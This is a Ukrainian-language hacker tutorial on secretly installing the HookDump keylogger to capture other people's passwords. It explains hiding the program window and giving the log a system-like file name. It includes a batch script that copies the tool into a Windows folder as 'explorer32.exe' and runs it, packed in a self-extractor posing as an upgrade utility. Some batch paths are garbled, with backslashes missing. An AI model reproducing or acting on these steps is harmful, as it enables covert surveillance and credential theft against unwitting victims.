Отже, ми будемо користуватися славної програмою під назвою HookDump (попередньо ee ще й завантажити непогано. Брати тут: pfp.euro.ru/hookdump.rar), назва якої у вільному перекладі означає «купа гачків» (переклад аматорський, не професійний) Отже, завантажуємо, запускаємо, дивимося… Ймовірно, перед вами розташовується симпатичне сіреньке віконечко незрозумілого змісту з купою опцій. Так. Бачите малееенький хрестик у верхньому правому куті вікна? Натисніть… Вільні. Тобто, зовсім вільні… Заходьте ще 🙂 Андр констракшн і все таке… Так жарт! Чорний гумор… Сміятися не обов’язково… Отже. Коротке напутнє слово. Ймовірно, багато хто з присутніх вже і без мене достатньо просунуті, розумні і хитрі, знайомі з багатообіцяючою технологією «копіювання в середовищі Віндовс»… Якщо ви вважаєте себе крутим-хакером, а мене — занудним маразматиком, можете далі не читати… Без образ. Ну а якщо ви хочете дізнатися деякі тонкощі уведення паролів прямо з під носа у ворога — читайте далі. Отже. Ви натиснули на малееенький чорненький хрестик в кутку екрану, і нічого не сталося? Невже? Так і треба, заспокойтеся, просто ми не будемо змінювати налаштування безпосередньо з програми. Це довго, нудно, при такому варіанті можна запросто підсадити собі в авторан клавіатурного шпигуна, та й взагалі… не по-хакерски це 🙂 Так що вантажимо ноутпад і відкриваємо філе під назвою Hookdump.ini, розташоване в одній директорії з програмою. Дивимося. Саамый перший параметр — Show відповідає за показ головного вікна програми при запуску, що нам нафіг не треба. Так що присвоюємо йому значення «00» і дивимося далі.

Dir — це шлях до каталогу, де буде створюватися файл звіту. Краще, звичайно, туди прописати шлях до папки з вінду, але це тільки тоді, коли шлях заподленно відомий, в іншому випадку залишаємо графу порожньою — файл буде створюватися в директорії з програмою. File — ім’я файлу звіту. Краще написати щось на зразок Shell.exe або explorer32.dll — файли з такими іменами зазвичай бояться видаляти. Далі. Значення XorBase краще не змінювати, залишити рівним 85. А BufSize напишіть «255» — це збільшить швидкість роботи програми. В розділі Options рівними «01» ставимо тільки WritePopKey, WriteExeName, WriteWindowName, UseBuffer, WriteWndExeTime, все інше — обнуляем. Така «тонке» налаштування дозволить записувати у файл звіту лише найважливіше (наприклад, паролі з MSdialup’a :)) Все, пастка готова, залишилося тільки підсунути ee «споживачеві». Звичайно, для цієї мети підходять всі спеціалізовані програми-установки, типу InstallShield’a або WiseIntallation, які з самого свого народження були призначені якраз для воро… вибачте, встановлення різного совта, але вони громіздкі, повільні, з’їдають купу місця на вінчестері, і, врешті-решт, за диск з прог потрібно знову платити гроші, що нас не влаштовує. Так що краще скористатися програмою WinZip Self Extractor для Вин32. Вам доведеться сходити куди-небудь на winzip.com і викачати програму самостійно. Заодно візьміть там сам ВинЗип. Навіщо нам потрібен Селф-екстрактор? Просто він може при завданні певних команд, розпакувати групу файлів темп-директорію, а звідти запустити який-небудь виконуваний файл з командами, за який може зійти звичайний батник (пакетний файл з розширенням *.bat) Отже, створюємо батник приблизно такого змісту:

[email protected] off

copy hookdmp.dll c:md98hookdmp.dll

copy hookdmp.exe c:md98explorer32.exe

copy hookdump.ini c:md98hookdump.ini

call c:md98explorer32.exe

echo The MatriX has got you…

Всі! Тепер пакуємо це все в ZIP-архів і запускаємо self-extractor. Виберіть спосіб установки — Software. Далі все просто. Можна навіть якесь напуття написати, типу яка це крута програмка і як вона тута щас все заапргрейдит… Перед вами готовий экзэшник, готовий до вживання, юзайте…